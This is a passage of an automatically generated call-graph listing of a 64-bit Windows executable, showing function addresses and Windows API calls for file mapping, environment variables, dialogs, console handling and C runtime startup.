7ff6e7e24780 27850->27851 27853 7ff6e7e2478a 27850->27853 27852 7ff6e7e421d0 33 API calls 27851->27852 27852->27853 27853->27826 27855 7ff6e7e217be __scrt_get_show_window_mode 27854->27855 27909 7ff6e7e28a48 27855->27909 27870 7ff6e7e3188e 27869->27870 27872 7ff6e7e318a1 27870->27872 27929 7ff6e7e2e948 27870->27929 27874 7ff6e7e318d8 27872->27874 27925 7ff6e7e4236c 27872->27925 27878 7ff6e7e31a37 27874->27878 27936 7ff6e7e2a984 31 API calls _invalid_parameter_noinfo_noreturn 27874->27936 27875 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27876 7ff6e7e31ad0 27875->27876 27878->27875 27879->27810 27880->27835 27882 7ff6e7e140dd 27881->27882 27884 7ff6e7e140d7 __scrt_get_show_window_mode 27881->27884 27882->27884 27937 7ff6e7e14120 27882->27937 27884->27817 27885->27820 27887 7ff6e7e31f29 27886->27887 27888 7ff6e7e31f5d 27887->27888 27889 7ff6e7e31f55 27887->27889 27890 7ff6e7e31f49 27887->27890 27908->27810 27926 7ff6e7e4239f 27925->27926 27927 7ff6e7e423c8 27926->27927 27928 7ff6e7e31870 108 API calls 27926->27928 27927->27874 27928->27926 27930 7ff6e7e2ecd8 103 API calls 27929->27930 27931 7ff6e7e2e95f ReleaseSemaphore 27930->27931 27932 7ff6e7e2e984 27931->27932 27933 7ff6e7e2e9a3 DeleteCriticalSection CloseHandle CloseHandle 27931->27933 27934 7ff6e7e2ea5c 101 API calls 27932->27934 27936->27878 27940 7ff6e7e14149 27937->27940 27942 7ff6e7e14168 __std_swap_ranges_trivially_swappable __scrt_get_show_window_mode 27937->27942 27938 7ff6e7e12018 33 API calls 27939 7ff6e7e141eb 27938->27939 27941 7ff6e7e421d0 33 API calls 27940->27941 27940->27942 27941->27942 27942->27938 27978 7ff6e7e28892 27977->27978 27979 7ff6e7e28882 27977->27979 27978->27504 27984 7ff6e7e223f0 27979->27984 27982 7ff6e7e42320 _handle_error 8 API calls 27981->27982 27983 7ff6e7e1f7dc 27982->27983 27983->27405 27983->27507 27985 7ff6e7e2240f 27984->27985 27988 7ff6e7e22aa0 101 API calls 27985->27988 27986 7ff6e7e22428 27989 7ff6e7e22bb0 101 API calls 27986->27989 27987 7ff6e7e22438 27987->27978 27988->27986 27989->27987 27991 7ff6e7e3fc94 27990->27991 27992 7ff6e7e1129c 33 API calls 27991->27992 27993 7ff6e7e3fca4 27992->27993 28004 7ff6e7e15e67 28002->28004 28003 7ff6e7e16084 28087 7ff6e7e285f0 28003->28087 28004->28003 28005 7ff6e7e15ea5 28004->28005 28013 7ff6e7e15eb7 28004->28013 28097 7ff6e7e128a4 82 API calls 2 library calls 28005->28097 28008 7ff6e7e16134 28104 7ff6e7e16fcc 82 API calls 28008->28104 28010 7ff6e7e15eb2 28012 7ff6e7e169af 28010->28012 28018 7ff6e7e169e4 28010->28018 28028 7ff6e7e169ef 28010->28028 28011 7ff6e7e15f44 28099 7ff6e7e16d88 82 API calls 28011->28099 28016 7ff6e7e42320 _handle_error 8 API calls 28012->28016 28013->28008 28013->28011 28098 7ff6e7e16f38 33 API calls BuildCatchObjectHelperInternal 28013->28098 28014 7ff6e7e1612e 28014->28008 28020 7ff6e7e16973 28014->28020 28027 7ff6e7e285f0 104 API calls 28014->28027 28019 7ff6e7e169c3 28016->28019 28021 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28018->28021 28019->27531 28020->28010 28024 7ff6e7e169e9 28021->28024 28025 7ff6e7e16034 28025->28003 28029 7ff6e7e4236c 108 API calls 28025->28029 28032 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28028->28032 28034 7ff6e7e169f5 28032->28034 28035 7ff6e7e16097 28103 7ff6e7e1433c 82 API calls 2 library calls 28035->28103 28038 7ff6e7e15f5d 28038->28025 28038->28035 28100 7ff6e7e1433c 82 API calls 2 library calls 28038->28100 28101 7ff6e7e16d88 82 API calls 28038->28101 28102 7ff6e7e1a1a0 109 API calls _handle_error 28038->28102 28085->27531 28088 7ff6e7e2869a 28087->28088 28089 7ff6e7e28614 28087->28089 28090 7ff6e7e140b0 33 API calls 28088->28090 28094 7ff6e7e2867c 28088->28094 28091 7ff6e7e140b0 33 API calls 28089->28091 28089->28094 28092 7ff6e7e286b3 28090->28092 28093 7ff6e7e2864d 28091->28093 28096 7ff6e7e228d0 104 API calls 28092->28096 28094->28014 28096->28094 28097->28010 28099->28038 28100->28038 28101->28038 28102->28038 28104->28010 28131 7ff6e7e19be7 28123->28131 28124 7ff6e7e19c1b 28125 7ff6e7e42320 _handle_error 8 API calls 28124->28125 28126 7ff6e7e19c9d 28125->28126 28126->27547 28128 7ff6e7e19c83 28130 7ff6e7e11fa0 31 API calls 28128->28130 28130->28124 28131->28124 28131->28128 28132 7ff6e7e19cae 28131->28132 28258 7ff6e7e25294 28131->28258 28276 7ff6e7e2db60 28131->28276 28133 7ff6e7e19cbf 28132->28133 28280 7ff6e7e2da48 CompareStringW 28132->28280 28133->28128 28135 7ff6e7e120b0 33 API calls 28133->28135 28135->28128 28149 7ff6e7e25f3a 28136->28149 28137 7ff6e7e2619b 28138 7ff6e7e261ce 28142 7ff6e7e1129c 33 API calls 28149->28137 28149->28138 28149->28142 28208->27538 28256->27595 28257->27595 28259 7ff6e7e252d4 28258->28259 28263 7ff6e7e25312 __vcrt_InitializeCriticalSectionEx 28259->28263 28269 7ff6e7e25339 __vcrt_InitializeCriticalSectionEx 28259->28269 28281 7ff6e7e313f4 CompareStringW 28259->28281 28260 7ff6e7e42320 _handle_error 8 API calls 28262 7ff6e7e25503 28260->28262 28262->28131 28265 7ff6e7e25382 __vcrt_InitializeCriticalSectionEx 28263->28265 28263->28269 28282 7ff6e7e313f4 CompareStringW 28263->28282 28266 7ff6e7e1129c 33 API calls 28265->28266 28267 7ff6e7e25439 28265->28267 28265->28269 28268 7ff6e7e25426 28266->28268 28270 7ff6e7e25489 28267->28270 28272 7ff6e7e2551b 28267->28272 28271 7ff6e7e272cc 8 API calls 28268->28271 28269->28260 28270->28269 28283 7ff6e7e313f4 CompareStringW 28270->28283 28271->28267 28274 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28272->28274 28277 7ff6e7e2db73 28276->28277 28278 7ff6e7e120b0 33 API calls 28277->28278 28279 7ff6e7e2db91 28277->28279 28278->28279 28279->28131 28280->28133 28281->28263 28282->28265 28283->28269 28343 7ff6e7e12da5 28342->28343 28345 7ff6e7e13025 28343->28345 28388 7ff6e7e2b7e4 31 API calls _invalid_parameter_noinfo_noreturn 28343->28388 28346 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28345->28346 28347 7ff6e7e13045 28346->28347 28348 7ff6e7e4236c 108 API calls 28347->28348 28349 7ff6e7e1306f 28348->28349 28351 7ff6e7e4236c 108 API calls 28349->28351 28350 7ff6e7e12dfa 28350->28345 28353 7ff6e7e11fa0 31 API calls 28350->28353 28352 7ff6e7e13087 28351->28352 28352->27713 28354 7ff6e7e12fb9 28353->28354 28355 7ff6e7e11fa0 31 API calls 28354->28355 28356 7ff6e7e12fc5 28355->28356 28357 7ff6e7e11fa0 31 API calls 28356->28357 28358 7ff6e7e12fd1 28357->28358 28359 7ff6e7e11fa0 31 API calls 28358->28359 28360 7ff6e7e12fdd 28359->28360 28361 7ff6e7e11fa0 31 API calls 28360->28361 28362 7ff6e7e12fe9 28361->28362 28363 7ff6e7e11fa0 31 API calls 28362->28363 28364 7ff6e7e12ff5 28363->28364 28365 7ff6e7e11fa0 31 API calls 28364->28365 28366 7ff6e7e13001 28365->28366 28367 7ff6e7e11fa0 31 API calls 28366->28367 28368 7ff6e7e1300d 28367->28368 28369 7ff6e7e11fa0 31 API calls 28368->28369 28370 7ff6e7e13019 28369->28370 28371 7ff6e7e11fa0 31 API calls 28370->28371 28371->28345 28372->27718 28373->27721 28375 7ff6e7e287df 28374->28375 28376 7ff6e7e287af 28374->28376 28380 7ff6e7e4236c 108 API calls 28375->28380 28387 7ff6e7e2882b 28375->28387 28377 7ff6e7e4236c 108 API calls 28376->28377 28379 7ff6e7e287ca 28377->28379 28382 7ff6e7e4236c 108 API calls 28379->28382 28383 7ff6e7e28814 28380->28383 28381 7ff6e7e28845 28385 7ff6e7e2461c 108 API calls 28381->28385 28382->28375 28384 7ff6e7e4236c 108 API calls 28383->28384 28384->28387 28386 7ff6e7e28851 28385->28386 28389 7ff6e7e2461c 28387->28389 28388->28350 28390 7ff6e7e24632 28389->28390 28392 7ff6e7e2463a 28389->28392 28391 7ff6e7e2e948 108 API calls 28390->28391 28391->28392 28392->28381 28394 7ff6e7e2163e 28393->28394 28396 7ff6e7e21681 28393->28396 28394->28396 28397 7ff6e7e231bc 51 API calls 28394->28397 28395 7ff6e7e1e600 31 API calls 28399 7ff6e7e216de 28395->28399 28398 7ff6e7e11fa0 31 API calls 28396->28398 28401 7ff6e7e216a0 28396->28401 28397->28394 28398->28396 28402 7ff6e7e2178d 28399->28402 28403 7ff6e7e2175b 28399->28403 28400 7ff6e7e42320 _handle_error 8 API calls 28404 7ff6e7e1e58a 28400->28404 28401->28395 28405 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28402->28405 28403->28400 28404->27343 28404->27345 28406 7ff6e7e21792 28405->28406 28407->27011 28408->27015 28409->27018 25398 7ff6e7e42d6c 25423 7ff6e7e427fc 25398->25423 25401 7ff6e7e42eb8 25522 7ff6e7e43170 7 API calls 2 library calls 25401->25522 25402 7ff6e7e42d88 __scrt_acquire_startup_lock 25404 7ff6e7e42ec2 25402->25404 25406 7ff6e7e42da6 25402->25406 25523 7ff6e7e43170 7 API calls 2 library calls 25404->25523 25407 7ff6e7e42dcb 25406->25407 25412 7ff6e7e42de8 __scrt_release_startup_lock 25406->25412 25431 7ff6e7e4cd90 25406->25431 25408 7ff6e7e42ecd abort 25410 7ff6e7e42e51 25435 7ff6e7e432bc 25410->25435 25412->25410 25519 7ff6e7e4c050 35 API calls __GSHandlerCheck_EH 25412->25519 25413 7ff6e7e42e56 25438 7ff6e7e4cd20 25413->25438 25524 7ff6e7e42fb0 25423->25524 25426 7ff6e7e4282b 25526 7ff6e7e4cc50 25426->25526 25430 7ff6e7e42827 25430->25401 25430->25402 25432 7ff6e7e4cdeb 25431->25432 25433 7ff6e7e4cdcc 25431->25433 25432->25412 25433->25432 25543 7ff6e7e11120 25433->25543 25606 7ff6e7e43cf0 25435->25606 25437 7ff6e7e432d3 GetStartupInfoW 25437->25413 25608 7ff6e7e50730 25438->25608 25440 7ff6e7e4cd2f 25442 7ff6e7e42e5e 25440->25442 25612 7ff6e7e50ac0 35 API calls _snwprintf 25440->25612 25443 7ff6e7e40754 25442->25443 25614 7ff6e7e2dfd0 25443->25614 25447 7ff6e7e4079a 25701 7ff6e7e3946c 25447->25701 25449 7ff6e7e407a4 __scrt_get_show_window_mode 25706 7ff6e7e39a14 25449->25706 25451 7ff6e7e40819 25452 7ff6e7e4096e GetCommandLineW 25451->25452 25502 7ff6e7e40ddc 25451->25502 25455 7ff6e7e40980 25452->25455 25494 7ff6e7e40b42 25452->25494 25453 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25454 7ff6e7e40de2 25453->25454 25809 7ff6e7e47904 25454->25809 25716 7ff6e7e1129c 25455->25716 25457 7ff6e7e40b51 25461 7ff6e7e11fa0 31 API calls 25457->25461 25464 7ff6e7e40b68 BuildCatchObjectHelperInternal 25457->25464 25461->25464 25463 7ff6e7e409a5 25726 7ff6e7e3cad0 25463->25726 25769 7ff6e7e11fa0 25464->25769 25465 7ff6e7e40b93 SetEnvironmentVariableW GetLocalTime 25774 7ff6e7e23e28 25465->25774 25468 7ff6e7e409af 25468->25454 25472 7ff6e7e409f9 OpenFileMappingW 25468->25472 25473 7ff6e7e40adb 25468->25473 25475 7ff6e7e40a19 MapViewOfFile 25472->25475 25476 7ff6e7e40ad0 CloseHandle 25472->25476 25481 7ff6e7e1129c 33 API calls 25473->25481 25475->25476 25478 7ff6e7e40a3f UnmapViewOfFile MapViewOfFile 25475->25478 25476->25494 25478->25476 25482 7ff6e7e40a71 25478->25482 25480 7ff6e7e40c75 25802 7ff6e7e367b4 25480->25802 25484 7ff6e7e40b00 25481->25484 25814 7ff6e7e3a190 33 API calls 2 library calls 25482->25814 25744 7ff6e7e3fd0c 25484->25744 25488 7ff6e7e40a81 25490 7ff6e7e3fd0c 35 API calls 25488->25490 25489 7ff6e7e367b4 33 API calls 25491 7ff6e7e40c87 DialogBoxParamW 25489->25491 25492 7ff6e7e40a90 25490->25492 25496 7ff6e7e40cd3 25491->25496 25815 7ff6e7e2b9b4 102 API calls 25492->25815 25757 7ff6e7e26454 25494->25757 25503 7ff6e7e40ce6 Sleep 25496->25503 25504 7ff6e7e40cec 25496->25504 25497 7ff6e7e40dd7 25500 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25497->25500 25498 7ff6e7e40aa5 25816 7ff6e7e2bb00 102 API calls 25498->25816 25500->25502 25501 7ff6e7e40ab8 25505 7ff6e7e40ac7 UnmapViewOfFile 25501->25505 25502->25453 25503->25504 25506 7ff6e7e40cfa 25504->25506 25817 7ff6e7e39f4c 49 API calls 2 library calls 25504->25817 25505->25476 25508 7ff6e7e40d06 DeleteObject 25506->25508 25509 7ff6e7e40d1f DeleteObject 25508->25509 25510 7ff6e7e40d25 25508->25510 25509->25510 25511 7ff6e7e40d6d 25510->25511 25512 7ff6e7e40d5b 25510->25512 25805 7ff6e7e394e4 25511->25805 25818 7ff6e7e3fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 25512->25818 25515 7ff6e7e40d60 CloseHandle 25515->25511 25519->25410 25522->25404 25523->25408 25525 7ff6e7e4281e __scrt_dllmain_crt_thread_attach 25524->25525 25525->25426 25525->25430 25528 7ff6e7e50d4c 25526->25528 25527 7ff6e7e42830 25527->25430 25530 7ff6e7e451a0 7 API calls 2 library calls 25527->25530 25528->25527 25531 7ff6e7e4ec00 25528->25531 25530->25430 25542 7ff6e7e4f398 EnterCriticalSection 25531->25542 25548 7ff6e7e191c8 25543->25548 25547 7ff6e7e42a01 25547->25433 25556 7ff6e7e256a4 25548->25556 25550 7ff6e7e191df 25559 7ff6e7e2b788 25550->25559 25554 7ff6e7e11130 25555 7ff6e7e429bc 34 API calls 25554->25555 25555->25547 25565 7ff6e7e256e8 25556->25565 25574 7ff6e7e113a4 25559->25574 25562 7ff6e7e19a28 25563 7ff6e7e256e8 2 API calls 25562->25563 25564 7ff6e7e19a36 25563->25564 25564->25554 25566 7ff6e7e256fe __scrt_get_show_window_mode 25565->25566 25569 7ff6e7e2eba4 25566->25569 25572 7ff6e7e2eb58 GetCurrentProcess GetProcessAffinityMask 25569->25572 25573 7ff6e7e256de 25572->25573 25573->25550 25575 7ff6e7e113ad 25574->25575 25583 7ff6e7e1142d 25574->25583 25576 7ff6e7e1143d 25575->25576 25580 7ff6e7e113ce 25575->25580 25594 7ff6e7e12018 33 API calls std::_Xinvalid_argument 25576->25594 25578 7ff6e7e113db __scrt_get_show_window_mode 25593 7ff6e7e1197c 31 API calls _invalid_parameter_noinfo_noreturn 25578->25593 25580->25578 25584 7ff6e7e421d0 25580->25584 25583->25562 25585 7ff6e7e421db 25584->25585 25586 7ff6e7e421f4 25585->25586 25588 7ff6e7e421fa 25585->25588 25595 7ff6e7e4bbc0 25585->25595 25586->25578 25592 7ff6e7e42205 25588->25592 25598 7ff6e7e42f7c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25588->25598 25591 7ff6e7e4220b 25599 7ff6e7e11f80 33 API calls 3 library calls 25592->25599 25593->25583 25600 7ff6e7e4bc00 25595->25600 25598->25592 25599->25591 25605 7ff6e7e4f398 EnterCriticalSection 25600->25605 25607 7ff6e7e43cd0 25606->25607 25607->25437 25607->25607 25609 7ff6e7e5073d 25608->25609 25610 7ff6e7e50749 25608->25610 25613 7ff6e7e50570 48 API calls 4 library calls 25609->25613 25610->25440 25612->25440 25613->25610 25819 7ff6e7e42450 25614->25819 25617 7ff6e7e2e026 GetProcAddress 25620 7ff6e7e2e03b 25617->25620 25621 7ff6e7e2e053 GetProcAddress 25617->25621 25618 7ff6e7e2e07b 25619 7ff6e7e2e503 25618->25619 25861 7ff6e7e4b788 39 API calls _snwprintf 25618->25861 25623 7ff6e7e26454 34 API calls 25619->25623 25620->25621 25621->25618 25624 7ff6e7e2e068 25621->25624 25626 7ff6e7e2e50c 25623->25626 25624->25618 25625 7ff6e7e2e3b0 25625->25619 25627 7ff6e7e2e3ba 25625->25627 25821 7ff6e7e27df4 25626->25821 25629 7ff6e7e26454 34 API calls 25627->25629 25630 7ff6e7e2e3c3 CreateFileW 25629->25630 25631 7ff6e7e2e4f0 CloseHandle 25630->25631 25632 7ff6e7e2e403 SetFilePointer 25630->25632 25636 7ff6e7e11fa0 31 API calls 25631->25636 25632->25631 25635 7ff6e7e2e41c ReadFile 25632->25635 25634 7ff6e7e2e51a 25642 7ff6e7e2e53e CompareStringW 25634->25642 25643 7ff6e7e1129c 33 API calls 25634->25643 25648 7ff6e7e11fa0 31 API calls 25634->25648 25676 7ff6e7e2e5cc 25634->25676 25829 7ff6e7e251a4 25634->25829 25834 7ff6e7e28090 25634->25834 25838 7ff6e7e232bc 25634->25838 25635->25631 25637 7ff6e7e2e444 25635->25637 25636->25619 25638 7ff6e7e2e800 25637->25638 25639 7ff6e7e2e458 25637->25639 25880 7ff6e7e42624 8 API calls 25638->25880 25644 7ff6e7e1129c 33 API calls 25639->25644 25641 7ff6e7e2e805 25642->25634 25643->25634 25649 7ff6e7e2e48f 25644->25649 25647 7ff6e7e2e63a 25650 7ff6e7e2e648 25647->25650 25651 7ff6e7e2e7c2 25647->25651 25648->25634 25652 7ff6e7e2e4db 25649->25652 25862 7ff6e7e2d0a0 25649->25862 25866 7ff6e7e27eb0 47 API calls 25650->25866 25654 7ff6e7e11fa0 31 API calls 25651->25654 25656 7ff6e7e11fa0 31 API calls 25652->25656 25658 7ff6e7e2e7cb 25654->25658 25659 7ff6e7e2e4e5 25656->25659 25657 7ff6e7e2e651 25660 7ff6e7e251a4 9 API calls 25657->25660 25662 7ff6e7e11fa0 31 API calls 25658->25662 25663 7ff6e7e11fa0 31 API calls 25659->25663 25664 7ff6e7e2e656 25660->25664 25661 7ff6e7e1129c 33 API calls 25661->25676 25665 7ff6e7e2e7d5 25662->25665 25663->25631 25666 7ff6e7e2e706 25664->25666 25673 7ff6e7e2e661 25664->25673 25852 7ff6e7e42320 25665->25852 25669 7ff6e7e2da98 48 API calls 25666->25669 25667 7ff6e7e28090 47 API calls 25667->25676 25671 7ff6e7e2e74b AllocConsole 25669->25671 25674 7ff6e7e2e6fb 25671->25674 25675 7ff6e7e2e755 GetCurrentProcessId AttachConsole 25671->25675 25672 7ff6e7e11fa0 31 API calls 25672->25676 25867 7ff6e7e2aae0 25673->25867 25879 7ff6e7e119e0 31 API calls _invalid_parameter_noinfo_noreturn 25674->25879 25677 7ff6e7e2e76c 25675->25677 25676->25647 25676->25661 25676->25667 25676->25672 25678 7ff6e7e232bc 51 API calls 25676->25678 25684 7ff6e7e2e778 GetStdHandle WriteConsoleW Sleep FreeConsole 25677->25684 25678->25676 25682 7ff6e7e2e7b9 ExitProcess 25684->25674 25686 7ff6e7e2aae0 48 API calls 25687 7ff6e7e2e6ce 25686->25687 25877 7ff6e7e2dc2c 33 API calls 25687->25877 25689 7ff6e7e2e6da 25878 7ff6e7e119e0 31 API calls _invalid_parameter_noinfo_noreturn 25689->25878 25691 7ff6e7e262dc GetCurrentDirectoryW 25692 7ff6e7e26300 25691->25692 25693 7ff6e7e2638d 25691->25693 25694 7ff6e7e113a4 33 API calls 25692->25694 25693->25447 25695 7ff6e7e2631b GetCurrentDirectoryW 25694->25695 25696 7ff6e7e26341 25695->25696 26082 7ff6e7e120b0 25696->26082 25698 7ff6e7e2634f 25698->25693 25699 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25698->25699 25700 7ff6e7e263a9 25699->25700 25702 7ff6e7e2dd88 25701->25702 25703 7ff6e7e39481 OleInitialize 25702->25703 25704 7ff6e7e394a7 25703->25704 25705 7ff6e7e394cd SHGetMalloc 25704->25705 25705->25449 25707 7ff6e7e39a49 25706->25707 25709 7ff6e7e39a4e BuildCatchObjectHelperInternal 25706->25709 25708 7ff6e7e11fa0 31 API calls 25707->25708 25708->25709 25710 7ff6e7e11fa0 31 API calls 25709->25710 25711 7ff6e7e39a7d BuildCatchObjectHelperInternal 25709->25711 25710->25711 25712 7ff6e7e11fa0 31 API calls 25711->25712 25713 7ff6e7e39aac BuildCatchObjectHelperInternal 25711->25713 25712->25713 25714 7ff6e7e11fa0 31 API calls 25713->25714 25715 7ff6e7e39adb BuildCatchObjectHelperInternal 25713->25715 25714->25715 25715->25451 25717 7ff6e7e112d0 25716->25717 25723 7ff6e7e1139b 25716->25723 25720 7ff6e7e11396 25717->25720 25721 7ff6e7e11338 25717->25721 25725 7ff6e7e112de BuildCatchObjectHelperInternal 25717->25725 26087 7ff6e7e11f80 33 API calls 3 library calls 25720->26087 25724 7ff6e7e421d0 33 API calls 25721->25724 25721->25725 26088 7ff6e7e12004 33 API calls std::_Xinvalid_argument 25723->26088 25724->25725 25725->25463 25727 7ff6e7e2d0a0 33 API calls 25726->25727 25736 7ff6e7e3cb1f BuildCatchObjectHelperInternal 25727->25736 25728 7ff6e7e3cd8b 25729 7ff6e7e3cdbe 25728->25729 25732 7ff6e7e3cde4 25728->25732 25730 7ff6e7e42320 _handle_error 8 API calls 25729->25730 25733 7ff6e7e3cdcf 25730->25733 25731 7ff6e7e2d0a0 33 API calls 25731->25736 25734 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25732->25734 25733->25468 25735 7ff6e7e3cde9 25734->25735 26090 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 25735->26090 25736->25728 25736->25731 25736->25732 25736->25735 25737 7ff6e7e3cdef 25736->25737 25742 7ff6e7e11fa0 31 API calls 25736->25742 25743 7ff6e7e1129c 33 API calls 25736->25743 26089 7ff6e7e2bb00 102 API calls 25736->26089 26091 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 25737->26091 25740 7ff6e7e3cdf5 25742->25736 25743->25736 25745 7ff6e7e3fd39 25744->25745 25746 7ff6e7e3fd3c SetEnvironmentVariableW 25744->25746 25745->25746 25747 7ff6e7e2d0a0 33 API calls 25746->25747 25755 7ff6e7e3fd74 25747->25755 25748 7ff6e7e3fdc3 25749 7ff6e7e3fdfa 25748->25749 25751 7ff6e7e3fe1b 25748->25751 25750 7ff6e7e42320 _handle_error 8 API calls 25749->25750 25752 7ff6e7e3fe0b 25750->25752 25753 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25751->25753 25752->25494 25752->25497 25754 7ff6e7e3fe20 25753->25754 25755->25748 25756 7ff6e7e3fdad SetEnvironmentVariableW 25755->25756 25756->25748 25758 7ff6e7e113a4 33 API calls 25757->25758 25759 7ff6e7e26489 25758->25759 25760 7ff6e7e2648c GetModuleFileNameW 25759->25760 25763 7ff6e7e264dc 25759->25763 25761 7ff6e7e264a7 25760->25761 25762 7ff6e7e264de 25760->25762 25761->25759 25762->25763 25764 7ff6e7e1129c 33 API calls 25763->25764 25765 7ff6e7e26506 25764->25765 25766 7ff6e7e2653e 25765->25766 25767 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25765->25767 25766->25457 25768 7ff6e7e26560 25767->25768 25770 7ff6e7e11fb3 25769->25770 25771 7ff6e7e11fdc 25769->25771 25770->25771 25772 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25770->25772 25771->25465 25773 7ff6e7e12000 25772->25773 25775 7ff6e7e23e4d swprintf 25774->25775 25776 7ff6e7e49ef0 swprintf 46 API calls 25775->25776 25777 7ff6e7e23e69 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25776->25777 25778 7ff6e7e3b014 LoadBitmapW 25777->25778 25779 7ff6e7e3b046 25778->25779 25780 7ff6e7e3b03e 25778->25780 25782 7ff6e7e3b04e GetObjectW 25779->25782 25783 7ff6e7e3b063 25779->25783 26092 7ff6e7e38624 FindResourceW 25780->26092 25782->25783 26106 7ff6e7e3849c 25783->26106 25786 7ff6e7e3b0ce 25797 7ff6e7e298ac 25786->25797 25787 7ff6e7e3b09e 26111 7ff6e7e38504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25787->26111 25789 7ff6e7e38624 10 API calls 25791 7ff6e7e3b08a 25789->25791 25790 7ff6e7e3b0a7 26112 7ff6e7e384cc 25790->26112 25791->25787 25793 7ff6e7e3b092 DeleteObject 25791->25793 25793->25787 25796 7ff6e7e3b0bf DeleteObject 25796->25786 26119 7ff6e7e298dc 25797->26119 25799 7ff6e7e298ba 26186 7ff6e7e2a43c GetModuleHandleW FindResourceW 25799->26186 25801 7ff6e7e298c2 25801->25480 25803 7ff6e7e421d0 33 API calls 25802->25803 25804 7ff6e7e367fa 25803->25804 25804->25489 25806 7ff6e7e39501 25805->25806 25807 7ff6e7e3950a OleUninitialize 25806->25807 25808 7ff6e7e7e330 25807->25808 26268 7ff6e7e4783c 31 API calls 2 library calls 25809->26268 25811 7ff6e7e4791d 26269 7ff6e7e47934 16 API calls abort 25811->26269 25814->25488 25815->25498 25816->25501 25817->25506 25818->25515 25820 7ff6e7e2dff4 GetModuleHandleW 25819->25820 25820->25617 25820->25618 25822 7ff6e7e27e0c 25821->25822 25823 7ff6e7e27e23 25822->25823 25824 7ff6e7e27e55 25822->25824 25826 7ff6e7e1129c 33 API calls 25823->25826 25881 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 25824->25881 25828 7ff6e7e27e47 25826->25828 25827 7ff6e7e27e5a 25828->25634 25830 7ff6e7e251c8 GetVersionExW 25829->25830 25831 7ff6e7e251fb 25829->25831 25830->25831 25832 7ff6e7e42320 _handle_error 8 API calls 25831->25832 25833 7ff6e7e25228 25832->25833 25833->25634 25835 7ff6e7e280a5 25834->25835 25882 7ff6e7e28188 25835->25882 25837 7ff6e7e280ca 25837->25634 25839 7ff6e7e232e7 GetFileAttributesW 25838->25839 25840 7ff6e7e232e4 25838->25840 25841 7ff6e7e232f8 25839->25841 25848 7ff6e7e23375 25839->25848 25840->25839 25891 7ff6e7e26a0c 25841->25891 25843 7ff6e7e42320 _handle_error 8 API calls 25845 7ff6e7e23389 25843->25845 25845->25634 25846 7ff6e7e2333c 25846->25848 25849 7ff6e7e23399 25846->25849 25847 7ff6e7e23323 GetFileAttributesW 25847->25846 25848->25843 25850 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25849->25850 25851 7ff6e7e2339e 25850->25851 25853 7ff6e7e42329 25852->25853 25854 7ff6e7e42550 IsProcessorFeaturePresent 25853->25854 25855 7ff6e7e2e7e4 25853->25855 25856 7ff6e7e42568 25854->25856 25855->25691 25981 7ff6e7e42744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25856->25981 25858 7ff6e7e4257b 25982 7ff6e7e42510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25858->25982 25861->25625 25864 7ff6e7e2d0d2 25862->25864 25863 7ff6e7e2d106 25863->25649 25864->25863 25865 7ff6e7e11744 33 API calls 25864->25865 25865->25864 25866->25657 25868 7ff6e7e2aaf3 25867->25868 25983 7ff6e7e29774 25868->25983 25871 7ff6e7e2ab58 LoadStringW 25872 7ff6e7e2ab86 25871->25872 25873 7ff6e7e2ab71 LoadStringW 25871->25873 25874 7ff6e7e2da98 25872->25874 25873->25872 26009 7ff6e7e2d874 25874->26009 25877->25689 25878->25674 25879->25682 25880->25641 25881->25827 25883 7ff6e7e28326 25882->25883 25886 7ff6e7e281ba 25882->25886 25890 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 25883->25890 25885 7ff6e7e2832b 25888 7ff6e7e281d4 BuildCatchObjectHelperInternal 25886->25888 25889 7ff6e7e258a4 33 API calls 2 library calls 25886->25889 25888->25837 25889->25888 25890->25885 25892 7ff6e7e26a4b 25891->25892 25912 7ff6e7e26a44 25891->25912 25894 7ff6e7e1129c 33 API calls 25892->25894 25893 7ff6e7e42320 _handle_error 8 API calls 25895 7ff6e7e2331f 25893->25895 25896 7ff6e7e26a76 25894->25896 25895->25846 25895->25847 25897 7ff6e7e26cc7 25896->25897 25898 7ff6e7e26a96 25896->25898 25899 7ff6e7e262dc 35 API calls 25897->25899 25900 7ff6e7e26ab0 25898->25900 25923 7ff6e7e26b49 25898->25923 25904 7ff6e7e26ce6 25899->25904 25901 7ff6e7e270ab 25900->25901 25964 7ff6e7e1c098 33 API calls 2 library calls 25900->25964 25976 7ff6e7e12004 33 API calls std::_Xinvalid_argument 25901->25976 25903 7ff6e7e26eef 25907 7ff6e7e270cf 25903->25907 25973 7ff6e7e1c098 33 API calls 2 library calls 25903->25973 25904->25903 25908 7ff6e7e26d1b 25904->25908 25962 7ff6e7e26b44 25904->25962 25905 7ff6e7e270b1 25915 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25905->25915 25979 7ff6e7e12004 33 API calls std::_Xinvalid_argument 25907->25979 25914 7ff6e7e270bd 25908->25914 25967 7ff6e7e1c098 33 API calls 2 library calls 25908->25967 25909 7ff6e7e270d5 25916 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25909->25916 25911 7ff6e7e26b03 25924 7ff6e7e11fa0 31 API calls 25911->25924 25930 7ff6e7e26b15 